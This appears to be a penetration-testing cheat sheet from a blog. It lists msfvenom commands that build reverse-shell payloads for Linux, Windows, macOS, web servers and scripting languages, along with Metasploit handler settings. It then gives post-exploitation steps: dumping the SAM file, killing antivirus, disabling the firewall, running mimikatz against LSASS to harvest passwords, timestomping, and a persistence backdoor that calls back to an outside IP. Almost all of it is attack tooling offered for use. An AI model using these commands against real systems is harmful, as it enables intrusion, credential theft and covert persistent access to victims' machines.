List payloads
I. Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
|
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
|
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
|
II. Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
|
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
|
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
|
III. Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
|
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
|
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
|
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
IV. Shellcode
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
|
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
|
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
|
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive
your incoming shells. Handlers should be in the following format.
VI. Handlers
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Meterpreter Useful Commands:
download c:\\windows\\repair\\sam /tmp
| |
execute -f c:\\windows\temp\exploit.exe
| |
portfwd add –l 3389 –p 3389 –r target
| |
portfwd delete –l 3389 –p 3389 –r target
| |
portfwd delete –l 3389 –p 3389 –r target
| |
Additional useful commands are as follows:
- msfconsole – r unicorn.rb
- meterpreter shell
- getsid
- getuid
- migrate
- getsystem
- run killav
- run checkvm
- exploit Windows7 Service Pack 1 msp
- use incognito
- run countermeasure
- run countermeasure –d –k
- shell
- netsh firewall set opmode disable //disable firewall
- run vnc
- load mimikatz
- ls
- upload /home/user/mimikatz.exe C:\\
- timestop mimikatz.exe -f "C:\\Windows\System32\\cmd.exe"
- shell
- mimikatz.exe
- privilege::debug
- inject::process lsass.exe sekurlsa.dll
- getLogonPasswords
- sekurlsa::logonPasswords full
- run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196
- attrib +h c:\autoexec.bat //make it hidden
- Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)
|
Like this:
Like Loading...
Related
Reverse Engineering, Malware Deep Insight 